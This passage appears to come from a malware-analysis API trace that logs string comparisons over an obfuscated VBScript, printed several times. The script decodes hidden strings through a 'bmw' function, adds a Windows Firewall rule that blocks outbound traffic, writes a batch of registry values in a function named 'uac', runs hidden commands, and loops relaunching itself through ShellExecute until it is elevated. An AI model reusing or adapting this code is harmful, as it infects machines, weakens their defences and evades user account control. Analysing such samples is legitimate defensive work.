PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 52 [0223.023] wcsncmp (_String1="EMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 56 [0223.023] wcsncmp (_String1="MEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 64 [0223.023] wcsncmp (_String1="EOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 56 [0223.023] wcsncmp (_String1="OFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 66 [0223.023] wcsncmp 